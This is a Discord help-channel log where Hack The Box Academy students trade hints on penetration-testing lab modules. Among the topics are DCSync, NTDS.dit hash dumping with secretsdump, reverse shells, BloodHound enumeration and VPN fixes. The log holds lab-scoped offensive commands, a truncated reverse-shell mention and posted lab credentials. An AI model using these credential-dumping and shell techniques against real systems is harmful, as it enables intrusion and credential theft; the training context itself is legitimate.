#modules

1 messages · Page 151 of 1

fathom pendant
#

You mean the pty code?

swift forge
#

Yes

fathom pendant
#

How do you expect a php code to run python?

#

You do the pty shell upgrade after connection

swift forge
#

?? I don't know what that even means

fathom pendant
#

The python pty is... well it's python code

next bronze
#

didn't do that module sorry

swift forge
#

Ok now I get it, just put it into the terminal once I'm shelled in

next bronze
#

the python code is used after you get a shell to upgrade to an interactive shell, it's not to create a reverse shell

swift forge
#

@fathom pendant & @next bronze thank you for the help

fathom pendant
#

Shrimple

stoic hare
#

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
I have used command for PS:
Get-WinEvent -FilterHashTable @{LogName='Security';ID='4625 '} | Select-Object -ExpandProperty Message
And I have already tried all variants and no one is correct answer: user0, user1, administator, NOUSER

rustic sage
#

if anyone is running vmware workstation pro 17.5 and has issues of your vm freezing there's this nifty button i just discovered that helps you clone your vm and make it compatible with the latest version of vmware workstation pro... no freezes so far after creating a clone and upgrading it

sly dome
#

Anyone has ever met this error ERROR kull_m_rpc_drsr_getDCBind from mimikatz DCSync, in such case does exist any workaround? because what i found on Google is that it does not.

supple patio
sly dome
#

This should be working AFAIK, administrator has DCSync rights. In the module its done with noPac.py (which calls secretsdump.py)

supple patio
sly dome
#

yes, but that makes no sense. That is used to dump memory

#

still i tried xD

supple patio
#

xd

sly dome
#

i've found some people here referencing the same error but no one answered them

supple patio
#

Wait, are you now administrator?

sly dome
#

i have his ticket

supple patio
sly dome
#

the user im trying to dump hashes of is arbitrary

#

it is just not working, im going to try if its double hop problem

#

by doing it from MS01

supple patio
#

/user: flag🤔

sly dome
#

what

supple patio
#

I mean the flag /user:

sly dome
#

yes what

supple patio
#

Iirc isn't it the target?

sly dome
#

what target

#

i am just trying DCSync from Windows using a ticket obtained with noPac vulnerability

supple patio
#

xD, wait a while trying to figure out with checking my notes

sly dome
#

its not done in the academy

#

trying extra stuff to practice

supple patio
#

Sounds great

next bronze
#

maybe use another tool to dcsync then

supple patio
#

But why are you specifying /user: administrator

sly dome
supple patio
sly dome
supple patio
#

Okay, I thought the user is "arbitrary"

sly dome
#

HAHAH

supple patio
#

I mean you're now trying to get your own hash

#

It could be the reason why is it not working

#

But i am not sure😵‍💫

sly dome
#

no lol

modern island
#

Module Broken Authentication
Question: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

So far what I have done:
||1. Issue a curl request to get the token for htbuser
2. extract the date into a YYYY-MM-DD hh:mm:ss format
3. feed the format into bash's built in date function to transfer the date to millis
4. feed the produced millis to a modified reset_token_time.py script, that uses the name "htbadmin" + the time in millis to create the md5 hash and use the produced hash to make a request to the "check" to verify if the token is valid.

I have actively tried debugging the issue to discover where in the steps I am going wrong (I assume in the last) but I have been unable to figure it out. Feel free to PM me for this issue.
||

modern island
#

Yes, I have stated it in the steps I have taken.

proven basalt
#

hey guys i am new in this server , so please tell me about this server and modules actually i dont know coding really but, i think im going to learn new in this server

sly dome
#

if it is working from the MS01, can it be Double Hop problem?

eternal pivot
#

How can I "host discover" my hackthebox target machine?

twin stirrup
#

Anyone free to talk about the Web Attacks Skills Assessment

orchid pine
#

hello guys on FILE INCLUSION Log Poisoning section i have the flag but its not woking can somone check for me

acoustic sparrow
#

its it the fact that im using remmina to rdp and it keeps disconnecting? would other tools make it better anyone had the same issues?

sly dome
#

when i need RDP i do from Windows

#

only using xfreerdp for pth

next bronze
acoustic sparrow
#

especially after i type stuff in cmd

next bronze
#

use tcp for vpn

acoustic sparrow
#

im now trying it on pwnbox

short hare
#

I am stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS: DCSync

Every time I try to log in with the given cred but it fails with powershell ran as Administrator
I am using
User: htb-student
Password: HTB_@cademy_stdnt!

Can some one help me?

short hare
# next bronze use tcp for vpn

Can you explain a bit on how to do it

I am also facing the same problem

I have the option to download the VPN file
But to configure... ???????

next bronze
#

go to vpn settings > select TCP 443 > download and replace your old .ovpn file

sly dome
#

i got the DCSync with a LDAP TGS

next bronze
#

tbh I don't use mimikatz for dcsync, but you requested a LDAP tgs and it worked?

sly dome
#

yes xd

sly dome
#

my objective is try to replicate all techniques as possible from Win and from Linux

#

relying a lot on impacket is not helping me

#

like what if i dont have access to impacket in a real situation

next bronze
#

you can use rubeus no? nvm I don't think you can

supple patio
#

secretsdump))

sly dome
#

has to be that

sly dome
next bronze
#

there's also Invoke-Mimikatz

sly dome
#

yea i have it but its not different from mimikatz.exe

acoustic sparrow
#

nice call boys vpn to tcp made it stable

#

ty

sly dome
#

For an undocumented reason, Impacket's secretsdump relies on SMB before doing a DCSync (hence requiring a CIFS/domaincontroller SPN when using Kerberos tickets) while Mimikatz relies on LDAP before doing the DCSync (hence requiring a LDAP/domaincontroller SPN when using Kerberos tickets)

#

well, the "troubleshooting" made me learn some stuff

#

great

next bronze
#

interesting

sly dome
#

a lot

#

time for a rest

#

brain is 🔥

acoustic sparrow
#

atleast got the flag now

stoic hare
#

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
I have used command for PS:
Get-WinEvent -FilterHashTable @{LogName='Security';ID='4625 '} | Select-Object -ExpandProperty Message
And I have already tried all variants and no one is correct answer: user0, user1, administator, NOUSER

rustic sage
#

lab is only active for 89 minutes... any hints for finding better wordlists?

gray merlin
next bronze
stoic hare
next bronze
#

go back to the earlier sections and review the content

crisp monolith
#

In the Sub-domain fuzzing section of Attacking Web Applications with Ffuf, it asks to fuzz a subdomian of inlanefreight.htb. The problem is, it doesn't provide a way to spawn an instance to target. Any one dealt with this before?

crisp monolith
thorn urchin
#

you wrote .htb

#

99% that was your typo

crisp monolith
#

Probably lol

crisp monolith
manic wolf
thorn urchin
slate carbon
#

Does HTB have no power in removing academy skills assessment solutions from youtube?

autumn pilot
#

You can report them via the /spoiler command in the server

slate carbon
#

I reported them 2 months ago and nothing happened to the channel

#

He just keeps posting more and more spoilers

autumn pilot
#

i'll double check, hopefully there would be a resolution to this

rustic sage
sly dome
#

sadly…

#

dont search for them (?)

silk storm
#

guys, what do I do when I'm stuck?

#

Precisely I'm stuck in the Getting Started module in "public exploits".

fathom pendant
silk storm
fathom pendant
#

web enumeration is a thing

silk storm
#

ooooooook thanks

umbral fulcrum
#

Hi guys I stuck on "SQLMap Essentials " ==>> "Skills Assessment"
I got the -T final_flag but I can't C the content ...

I tried to C if I have write permissions (maybe trying RCE) but: "current user is DBA: False"

so I'm stuck don't know how to continue...
someone can give me a hint please?

short hare
#

😭 😭 😭 😭 😭

short hare
#

yes i have the adunn password
But i am supposed to rdp to the machine with htb-student and then open powershell right?

#

Man... I am really facing with this RDP
NotLikeThis

#

Yes

short hare
#

Point to be noted..!
Ahh man.. this is really a pain 😭

#

BTW solved the password and hash

Thanks

heavy marsh
#

Where is the LINUX01$ Kerberos ticket for the question:

"Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "

#

In linux pass the ticket

short hare
heavy marsh
#

I saw that with linikatz, is it this one?

#

I don't even know which one I'm looking for

#

nothing says linux01

#

oh, I see it now, nevermind

#

I imported it and it worked fine, thanks. Linikatz was the way to go on that one.

fathom pendant
short hare
heavy marsh
#

For the question:

Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.

I was able to find the Notes.zip, but it's in the root folder. I don't have access to the root folder.

#

Also, kira user has two passwords?

#

Doesn't make sense.

#

Nevermind, the locate option didn't work properly.

#

It was in the Documents folder, not root.

placid oyster
#

do yall have off topic?

#

nvm

eternal tusk
#

Hi there, I am new to Linux and I struck on Linux Fundamentals print. How do I figure what is the path to thb-student's home directory.

autumn pilot
#

also you can check the environment variables

supple patio
mossy nest
#

Hey guyz, I have a quick question about Active Directory Skill Assesment 2.

umbral fulcrum
umbral fulcrum
mossy nest
#

In one of the question, they asked to connect to a MS01, we can do it using a specific account got before

#

How that specific account can work on MS01 as I thought it was a local account

supple patio
mossy nest
#

You can DM me for more details, I didn't want to spoil

mossy nest
#

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

supple patio
mossy nest
#

Yes

#

I finished to answer the question

#

Because I followed some tutorial and help online

supple patio
#

DM, there are a couple of ways

solid gate
#

I'm stuck at module Attacking Common Services the first exercise Attacking FTP. To the point that I think the machine is broken. The task is to access the FTP server but no port is open revealing FTP. I got into the machine a different way and according to systemctl the service proftpd failed. :S

#

Also reset the machine and waited > 60 seconds after IP appears as per the instructions.

mossy nest
#

Which port did you scan ?

solid gate
#

All ports.

#

But looking at #858470491676737536 it seems the box is just super unstable and requires 3-4 resets before it boots correctly. Earliest mention I could find is a month ago, seems it has not been fixed.
I'm getting increasingly frustrated with HTB academy.

mossy nest
#

I think it happened to me too by the past

#

Don't worry, not every machine work this way

#

I might have been lucky but I was able to find the service

#

I can pm you my nmap output if you like

solid gate
#

On my third or fourth reset now and finally a promising port showed up.

mossy nest
#

Here you go !

#

Does anybody succeeded to install bloodhound on parrotOS ?

#

When installed it threw me errors corrected with that link

#

But when trying to put a collection in it, it shows me upload complete and 0%

#

Which seems to be a trouble from the version 4.0.3 of bloodhound

#

So I tried to install another version 4.1.0 which is not visible from apt i think

next bronze
#

make sure your collector is the right version for your bloodhound installation

mossy nest
#

Mmmmmh, I gathered my collector from sharphound

#

Which is not the same version as bloodhound

next bronze
#

sharphound v2.0.0 for bloodhound v4.3

mossy nest
#

Where did you get that information ?

#

Which version do I need for bloodhound 4.0.3

next bronze
#

it will tell you which version it's compatible with when you run sharphound

next bronze
mossy nest
#

Because when I apt get install bloodhound it's what apt give me

#

I tried getting the latest version from the zip file in the release but I don't know how to install it

next bronze
#

the version available in apt is 4.3.1 I think

mossy nest
#

└──╼ $sudo apt-get install bloodhound
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
bloodhound is already the newest version (4.0.3-0parrot1).
The following packages were automatically installed and are no longer required:
gconf-service gconf2-common libc++1 libc++1-11 libc++abi1-11 libgconf-2-4 libopengl0
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 290 not upgraded.

#

I download
BloodHound-linux-arm64.zip

#

But when I launch the Bloodhound in, it does nothing

#

even with chmod

next bronze
#

should be just ./bloodhound --no-sandbox

#

bloodhound itself is really just an electron app

mossy nest
#

Mmmh, it looks that I made a mistake

#

BloodHound-linux-arm64.zip

#

Was wrong

#

I had to install BloodHound-linux-x64.zip

#

Thank's XreOuS

#

Now I have to fight to upgrade neo4j... Dependency troube are never over...

tidal kelp
#

Module: File inclusion
Section: Upload exploitation
Are you suppose to be able to get a reverse shell? I've tried both the one from pentestmonkey and msfvenom without no luck

solid gate
mossy nest
#

Thank's !

next bronze
#

a lot of things are missing from bloodhoud CE, wouldn't recommend it unless you know how to write your own queries

mossy nest
#

I'm just trying to finish Active Directory Attack module

next bronze
tidal kelp
#

I solved the flag with a web shell

#

but since the session brings up reverse shell, I assumed it would be possible as well?

next bronze
#

normally yes, but the target in the lab in a docker container

tidal kelp
#

ok

#

cause this looks correct right?

#

and i have uploaded the shell and visited the upload/shell.php url

next bronze
#

yeah looks right

tidal kelp
#

ok, then Iguess its time to move on

#

lucky me that I didn't spend a hour or so trying to solve this...

sly dome
#

i got a reverse from the webshell

#

bash -c 'bash -i blah blah'

unique cape
#

can someone help me with the footprinting medium lab? i need some hints, im not sure where to head next

primal mesa
#

hi. i have ssh into t** and didnt find anything useful in the directories other than his own ssh and sql history. could you point me in the right direction on how to move forward? NotLikeThis

stoic hare
#

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
Firstly, I connected to the target (user10 in this exersice) after that found out domain controller "ACADEMY-ICL-DC"
I have used command for PS:
Get-WinEvent -FilterHashTable @{LogName='Security';ID='4625 '} | Select-Object -ExpandProperty Message
And I have already tried all variants and no one is correct answer: user0, user1, administator, NOUSER

analog dock
#

Share module name

#

And section

next bronze
stoic hare
next bronze
#

what's DC's hostname? you found the DC but did you run the command inside DC?

stoic hare
next bronze
#

did you then ssh into dc and run the command?

stoic hare
#

oh, I see that now, I guess that found this

stoic hare
#

Why do I can't start the next module (INTRODUCTION TO BASH SCRIPTING), if I have completed all the previous ones? There are not enough cubes

narrow solar
#

hey friends, i am at Attacking Enterprise Networks - Active Directory Compromise, when trying to kerp i get this error Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) , googled it and found i have to use the tool ntpdate or rdate, tried them with proxychains but didnt work, any hint please?

autumn pilot
#

Ntpdate is the way, you just need to figure out what it does and how you can use it

sterile epoch
#

Can I use a file to mention username formats in username anarchy if so which option should I use??

silver iris
#

Hi guys,

i need a nudge for the password credential hunting in windows module. I got the credentials for winscp, but they seem to be wrong, or at least give me access denied. I also tried the other ones and every combination of username and password (i think at least). I cant seem to get it to work. what am i missing?

umbral fulcrum
gusty flare
#

Hello, all. I've signed up for the HTB Academy Silver account and am doing CPTS now. I on the "Getting Started" module and they are doing the Nibbles machine. It says I can't play the machine unless I sign up for $14/month. Is this true? I kind of assumed the machines in the course would be already paid for. Just wanted to verify that in case there's a "free" way.

acoustic owl
gusty flare
supple patio
onyx wing
#

Anyone else having an issue getting the inbrowser OS to start up?

unique cape
#

i need help with Footprinting hard lab im close to finishing it :3

analog dock
unique cape
analog dock
#

No you don’t

unique cape
#

okay, i got to a point where i accessed credentials specifically and this is where im specifically at, ||toms password and i have SSH'd in but i dont know where to go next, i have tried to read the bash_history files and sql_history but i cant seem to figure outwhere to go next||

unique cape
candid lily
#

how to do this

#

i have his hash but i dont have access to DC01 which is internal

unique cape
analog dock
unique cape
#

oh it worked!, thank you im confused how i never thought of that

terse stream
#

I am doing Network Enumeration with Nmap module and on service enumeration part while solving the question I am confused and stuck which service has the flag? can anyone give me some sugestion how can i solve it?

fathom pendant
#

Doesn't the section tell you that sometimes you'll need to use netcat to connect to a service?

terse stream
#

yes I tried to coonect to service but I am not sure which service has the flag?

#

or after connecting to service what should I do in order to get a flag?

sterile epoch
#

username-anarchy/username-anarchy -i users.txt -F rule.txt
Can someone help me with this tool please?

#
%F%M%L
%L%F
%f%m%l
%f%l
%l%f

This is the rule file I created

fathom pendant
terse stream
next bronze
sterile epoch
#

I dunno

#

I checked the readme there was no mention of rule files only single formats

next bronze
#

then it probably doesn't

sterile epoch
#

ok thanks

late parcel
#

Awesome!

oblique spoke
#

HI! i got stucked at Attacking Common Services medium skills assessment i tried to bruteforce the open ports with no luck, but got the dig AXFR subdomains and thats it, can someone help please?

torpid kite
oblique spoke
fathom pendant
oblique spoke
#

yes

#

The specific thing ||ftp://ip:2121||

#

here 👆

torpid kite
oblique spoke
torpid kite
#

-p-

oblique spoke
torpid kite
#

scan with -p-

oblique spoke
torpid kite
oblique spoke
sly dome
#

that lab was fun

#

@oblique spoke tell us if u need further assistance

eternal tusk
eternal tusk
sly dome
#

/home/htb-student

eternal tusk
#

Thanks, it worked.

fathom pendant
#

Read just above question 1

sly dome
#

enough if you said only 'read'

fathom pendant
#

Whenever you see Target: Click here to Spawn the Target System above a set of questions... click it

#

You spawned the pwnbox

eternal tusk
#

Okay. I am still new to the Platfrom. Trying to learn it.

fathom pendant
#

This is taught in Intro to Academy Module

#

Aka the first thing

eternal tusk
#

Lol, I jumped over to Linux Fundamentals module cause I wanted to try out Linux with School.

fathom pendant
#

This module

#

It's still good to know how the platform works 😉

eternal tusk
#

Thanks, I will try to complete it first and then continue with the Linux module.

#

Much appreciated!

sterile pumice
#

It works well, but I also had to look for another way. Without spoiling, I can say intercept with burp and use burp to look for what you are searching. Developer tools from browsers are also a very good option. The original bash script and the curl from the course module don't work for me either.

white ore
#

Hello Guys,

sly dome
#

PetitPotam section:
how do we know this is the target --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp ?

fathom pendant
sly dome
hallow kiln
#

you just get hostnames from scanning

fathom pendant
#

but also scanning

sly dome
#

they skipped it in the module

hallow kiln
#

that part's assumed to have been done already

sly dome
#

its not 🙂

white ore
#

Do you experiment an issue on module ATTACKING WEB APPLICATIONS WITH FFUF with question Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it? . when i use fuff, it runs a few second and slow down the number of reqs to 1 req/s ...but the big issue is that, when i stop the command, i don't have access to Internet and that impact all my VM running with NAT mode. I need to reinstall vmware in repair mode to recover Internet Access.

sly dome
#

but a quicker and simpler way is running certutil.exe from a domain joined host

hallow kiln
#

to obtain certificates?

sly dome
#

to obtain the hostname

sterile epoch
#

Hi I am in the Active_Directory and ntds.dit section of password attacks and have successfully captured the ntds file. How can I extract the hashes from it?

fathom pendant
hallow kiln
#

not if you don't have access to a domain joined host

sly dome
#

i should be scanning the 172.16.4.0/23 is what u mean

#

but im not doing that at this moment xd

#

not enough energy

sterile epoch
#

I read but there was no mention of anything to extract the ntds contents. In the last section of LSASS attacks there was mention of a tool pypykatz but I read the help of it there was no ntds in it

fathom pendant
next bronze
#

wait what you cat ntds? lol

fathom pendant
sly dome
#

its a fkn binary

#

encrypted data

fathom pendant
#

It's been a minute since i did that module

sly dome
#

so

sterile epoch
#

I tried to use cat on it but it turned wierd

sly dome
#

XD!

fathom pendant
#

:^)

sterile epoch
#

sad my terminal crashed

sly dome
#

A Faster Method: Using cme to Capture NTDS.dit

fathom pendant
#

Just use secretsdump

sly dome
#

check this out

sterile epoch
#

I did do it

sly dome
#

mate literally run netexec with --ntds flag

sterile epoch
#

and it returned plaintext

sterile epoch
#

I just wanted to know a method for doing it the long way

#

just for notes purpose

sly dome
#

secretsdump

next bronze
sly dome
#

or the Golang version

#

better for big NTDS.dit files

sterile epoch
#

ok I will try it

sly dome
#

but netexec just does it for you

#

🤷

fathom pendant
sly dome
#

okk

fathom pendant
#

They explicitly said it

sly dome
#

issue 1 more command

#

to get the same result

#

🥱

fathom pendant
sterile epoch
#

to use the secretdump do I need the hlkm\system file?

sly dome
#

why are you not reading the documentation

sterile epoch
#

I read it

fathom pendant
#

I believe so

sterile epoch
#

my bad

#

I used the help option

#

not the readme

fathom pendant
#

But not 100%

sly dome
#

secretsdump -ntds ntds.dit.save -system system.save LOCAL

fathom pendant
#

¯_(ツ)_/¯

sterile epoch
#

do I need to install from the repo or just cloning will work because I am getting an error

#

Ok i got it

compact mist
#

hi all

sterile epoch
#

any idea of this?

sterile epoch
compact mist
#

I'm stuck in the Nmap module in the hard IDS lab, but I red the walkthrough and solved it, I need to know why we use nc --source port 53 and why ports 80 and 22 didn't work?

next bronze
strong elk
#

Hi guys, i just arrived on the server. I'm really stuck on Password attack - Protected files, the description says that we should use the cracked password of Kira's account but i don't see anything related to the user kira. Nothing in /etc/passwd and LaZagne didn't found anything. I'm really starting to struggle with this

next bronze
compact mist
strong elk
dreamy solar
#

Hello excuse me I don't undestand, where is flag?

next bronze
compact mist
next bronze
compact mist
#

during nmap scan the port 80 is open, when i use nc -nv -p 80 TARGET PORT , THE CONNECTION REFUSED

sly dome
#

is PetitPotam attack possible over a pivot? I ask because evertyhing for this attack is done through a machine domain joined and in the exam this can be different.

next bronze
compact mist
#

I get it, thanks 🙂

next bronze
compact mist
#

can you please give me the command you used ?

next bronze
#

same as yours

compact mist
#

and you got the flag ?

next bronze
#

no? the flag is not supposed to be there

#

nc doesn't tell you the service version, need nmap for that

compact mist
#

the destination port in my case is 50000 , so it is make sense ?

next bronze
sly dome
#

got it

#

i forgot to port forward the 445 :whoops:

sly dome
sly dome
#

but cool i got it with ligolo-ng

tawdry vapor
#

hello guys, i need help with AD enumeration & Attacks skills PART 1, when i upload chisel.exe, this error apear

compact mist
# next bronze huh?

i used this command nc -nv -p 80 tragetip 50000 but the connection refused even the port 80 is open

eternal tusk
#

Is it possible for someone to explain cd.. command in simple words? Sorry, I am confused right now.

tulip dragon
#

hey is there a way to use light mode in htb academy

next bronze
tulip dragon
#

rn my eyes can't focus in dark mode

next bronze
compact mist
next bronze
tulip dragon
next bronze
next bronze
tulip dragon
#

it only work with static mode

next bronze
tulip dragon
#

this is what i get from force light mode FeelsBadMan

strong elk
analog dock
strong elk
next bronze
#

lol I would check it but I don't have the password for the user

strong elk
#

If i try to login locally, the user kira is not even recognized

next bronze
#

what's the user you used to login?

strong elk
#

htb-ac-737093

#

There is no username or password given

analog dock
#

Are you ssh to the target?

next bronze
#

so you didn't ssh into the target?

strong elk
#

No i didn't, i suppose kira is the user i have to use to connect to ssh but i don't see how to get its password

next bronze
#

oh it's this one

#

mutate the password list given with the rule, then use that to bruteforce ssh with the user kira

strong elk
#

Oh ok i'll try that tomorrow, thanks for your help

next bronze
#

might want to do it overnight cause it's gonna take a while lol

hallow kiln
#

I wouldn't brute-force SSH

next bronze
#

me too but.. you're supposed to for that question

hallow kiln
#

if it's the question I think it is, you can, but you don't have to, it just says to SSH in to get the flag, but there's other services running

next bronze
#

ah ok that's probably the better way, can't remember how I did it

sly dome
#

any caveats i am missing?

velvet flax
#

Is there anyone I can connect with and gain knowledge from?

sterile epoch
#

Why am I getting this error while I use smbserver.py to copy from pwnbox to victim?

fading oracle
#

Greetings!

sterile epoch
sterile epoch
fading oracle
#

i am doing the Attacking Tomcat module in CPTS

#

i need some sanity check

#

if its possible

fading oracle
next bronze
fading oracle
#

this is the last question

#

going through the examples none of its works i guess it is intentional?

fathom pendant
sly dome
next bronze
fading oracle
#

if i try to upload war file it just hangs

#

i also modified the jsp file as mentioned in the module to bypass

next bronze
#

that should work, I don't remember doing anything special for that section

fading oracle
#

doesnt work

#

my connection is good though firewall off

next bronze
next bronze
fading oracle
#

i resetted 3 times

#

the same

#

i wonder maybe it is intentional that it hangs

sly dome
#

i get authentication error

#

it is related with the Guest access

fading oracle
#

@next bronze can you try if it works for you?

next bronze
sly dome
#

me 2 🙂

#

as i told you it does not work without credentials

#

i think you have some extra setting

#

by default it is disabled

#
Starting from Windows 10, version 1709 and Windows Server 2019, SMB2 and SMB3 clients no longer allow the following actions by default:

Guest account access to a remote server.
Fall back to the Guest account after invalid credentials are provided.
next bronze
#

I have yet to encounter a windows machine that does that

sly dome
#

does what?

next bronze
#

needs creds to access smb

sly dome
#

fresh install Windows 10 v1709 or newer

#

and you will get it 🙂

#

can you read? i think you are a smart individual, it says by default on Win10 v1709 onwards

#

you had to disable it in Win11

thorn urchin
#

Ive see it

#

its why impacket lets you setup creds for it too

sly dome
#

it was introduced in Feb 2023 tho

#

nvm

#

it is the article date

#

October 2017

undone narwhal
sly dome
#

no

undone narwhal
#

idk, I just tried on my win11 without creds and it worked

sly dome
#

let me share the error with you

#

wrong mention

next bronze
next bronze
sly dome
next bronze
fading oracle
# next bronze

i tried this too but for me i cant upload the file on the page

#

@next bronze interesting it must be my browser than fuckin firefox.. i tried now with chromium and it instantly uploaded..

#

i wonder what is the reason

next bronze
#

I used firefox

eternal tusk
#

He guys, here's the another question; I need your help.
Question: What is the index number of the "sudoers" file in the "/etc" directory?

analog dock
eternal tusk
#

Lol, that was cruel. Thanks, much appreciated! @analog dock

analog dock
next bronze
eternal tusk
#

So, I ended up using the cd /etc then stat /etc/sudoers

storm dawn
#

Hi, I'm having trouble connecting the VPN in my own VM. I use a Kali virtual machine in a Windows OS. When I try to connect to the academy VPN using openvpn it connects but nothing works later, I mean, the academy web page can't charge

#

I don't know what is happening because when I connect to the VPN with windows and then I open the VM, it works, but when I connect from my VM it doesn't

eternal tusk
#

maybe have a look at network settings of Virtualbox or VMware.

storm dawn
#

It's in NET option

next bronze
storm dawn
#

I would like to connect to the VPN directly in my VM because it's from where I'm working

next bronze
#

I know that, have you tested if you could connect to any of the module targets?

thorn urchin
storm dawn
storm dawn
thorn urchin
#

the academy vpn shouldnt affect that at all, odd

next bronze
#

yeah you don't need a vpn to load the academy webpages

wraith spoke
#

Oh man. These hydra attack modules get me every time. 72h of bruteforce remaining. Hoping that admin is the right username.

storm dawn
#

But do I need it to connect to the section target?

storm dawn
thorn urchin
#

well dont load the academy vpn while doing starting point

storm dawn
#

I mean, the starting point VPN does the same thing

#

It's not just with the academy VPN, it's all VPNs

next bronze
#

vpn connection in your vm makes the pages not load in your host?

wraith spoke
storm dawn
next bronze
#

why not access them from windows then, you don't need vpn to load academy pages

rustic sage
storm dawn
#

Yes, but it says this:

next bronze
#

what about it?

storm dawn
#

It says to download a VPN connection file and I guess it's for connecting to the target

#

Isn't it?

next bronze
#

yeah, you connect to it in your vm

storm dawn
#

Yes that's exactly what I can't do

#

Because then the webpage can't load if I'm connected to the VPN

#

And then I can't submit the answers

next bronze
storm dawn
#

No

final maple
next bronze
# storm dawn No

so if you're able to access academy in your host, you can sumbit answers there

wraith spoke
storm dawn
#

But it's uncomfortable to work like that, that's why I'm trying to solve this. Maybe now it's just for the academy but I need to do more things and maybe it's not a good way to work. Anyway, thanks!

next bronze
next bronze
final maple
final maple
next bronze
#

/usr/lib/python3/dist-packages/impacket/msada_guids.py

final maple
next bronze
storm dawn
next bronze
eternal tusk
#

Here's another question.
What is the name of the last modified file in the "var/backups" directory?

next bronze
final maple
final maple
next bronze
#

hmm did you get those two files from github?

eternal tusk
next bronze
final maple
#

I remember using dacledit when I ws doing the DACLI module and it worked just fine...now it throws that error

next bronze
#

what's your impacket version

final maple
final maple
storm dawn
next bronze
next bronze
final maple
storm dawn
next bronze
#

and remove the old versions if dacledit is the only modification you made

final maple
#

So pipx install -r requirements.txt?

next bronze
#

python3 -m pipx install impacket

final maple
swift forge
#

Anyone on that is familiar with searchsploit? Working on the knowledge check for Getting Started. Did the scan, used searchsploit to find the exploit, but not sure what to do next. Went back to the lesson and it only showed how to search, not how to use the exploit.

next bronze
final maple
next bronze
#

nice

final maple
swift forge
#

@next bronze so I think I missed a step which is causing some of my confusion, I've been footprinting but can't find anything that would help me get in to get a foothold

#

Been looking at the source code and haven't been able to find anything

eternal tusk
#

Here's another question.
What is the name of the last modified file in the "var/backups" directory?

next bronze
swift forge
#

@next bronze yes I'm at the target in the browser, I'm inspecting the source code but can't find anything in the HTML

next bronze
#

don't need to look at the source code, what you need to exploit is right in front of you

next bronze
swift forge
#

@next bronze so I'm on the last page "Knowledge Check". I'm trying to gain my foothold into the target but I'm not finding anything on it

#

@next bronze I got in... sometimes trying the most basic thing is the answer

sly dome
#

i understand you now, impossible to make a DCSync from windows probably due to Double Hop but got it working at 1st try with secretsdump.py 🤷

thorn urchin
primal mesa
narrow kelp
#

Hello,
Can I ask advise on modules path here ?

knotty timber
#

sorry new to this discord thing and hackthebox aswell!

fathom pendant
narrow kelp
#

I have 6 years of experience in WebDev and think about switch to webapp pentester. So I am interested to the do the job role path for pentester.
My question are :

  • Base on 3day/week of study, is 1 year enought to complete those modules ?
  • Should I study other module before staging this one ?
fathom pendant
nimble gust
#

Hello everyone 👋🏻

robust elk
#

can someone help me with the 'attacking web applications with ffuf: skill assessment-web fuzzing' module, ive been stuck in a quest that says "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?". i found a page that does: http://faculty.academy.htb:47456/courses/linux-security.php7 but it keeps giving me a wrong answer. any help would be appreciated

#

nvm i just found the answer. instead of the actual port i had to type 'PORT'

#

dont know why its like that but whatever

thorn urchin
nova ocean
#

hi guys i have a question technical if someone have iis7 that means he have windows server 2008 he can change the iis7 to higher version or he need to change the whole windows server version to higher 2016 or later?

from INFORMATION GATHERING - WEB EDITION
IIS 7.0-8.5: Windows Server 2008 / Windows Server 2008R2

frigid sable
#

hi am new to ethical hacking and i found hack the box i think this is a good place to learn many things about ethical hacking, but i don't know which path is best for begineers. Can someone recommend what is the best path for beginners in the "path tab" in the hackthebox's website.

narrow solar
strong elk
hallow kiln
#

And you can use more threads for it, 48 is good

strong elk
strong elk
hallow kiln
#

Something's wrong tbh, cause even brute-forcing SSH shouldn't take 20 hours much less 60

strong elk
#

In any case thanks for your help

next bronze
strong elk
rustic sage
#

guys

#

i really need help...

#

with cURL

#

(CTF)

sly dome
#

@hallow kiln do you remember if in the AD module you could map domain trusts with Bloodhound? i get No returned data from query but the section indeed shows the data returned correctly

rustic sage
#

Guys, I started this CTF thing today and I need help. I started my first CTF challenge, I spawned the ip target but nothing... there are no indications on what I should do, it only says "use cURL and set the flag" above there are very minimal examples where there is nothing useful . even doing "curl <ip port>/index.html" or curl -s -O <ip port>/index.html" does nothing. It says that the flag is in the "download.php" file but I don't know how get there due to lack of explanations. Help me thanks.

hallow kiln
#

Does it show what exactly the trust relationship is?

hallow kiln
#

On the lines between them?

sly dome
#

i am not getting anything

sly dome
hallow kiln
#

Thank god, I thought you were using light mode lol

#

Lemme check my notes

sly dome
#

okk !

#

im rerunning SharpHound

hallow kiln
#

Yep, screenshot in my notes is from my own VM, mapped them just fine, for the record I was using bloodhound-python

sly dome
#

wtf xD

#

i ran it with -c all

next bronze
#

do you see the other domain if you search domain: ?

sly dome
#

yes i do

next bronze
#

then it didn't capture the trust properly, had that happen a few times

sly dome
#

oh

#

let me try then

#

bwt what's this .bin file generated by SharpHound?

hallow kiln
#

There's some data written to it that speeds up future runs, like if you're running bloodhound on a loop

next bronze
#

it's a local cache, you can disable it with --memcache which will use ram as cache instead of a local file

sly dome
#

thx

#

still cant map domain trusts :/

next bronze
hallow kiln
#

yeah, I don't remember the last time I ran sharphound

#

But it should be catching the trusts

#

Yup

sly dome
#

i used that

#

i have a pivot but i dont think this should be affecting xd

#

bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all

#

that is my command

vital adder
#
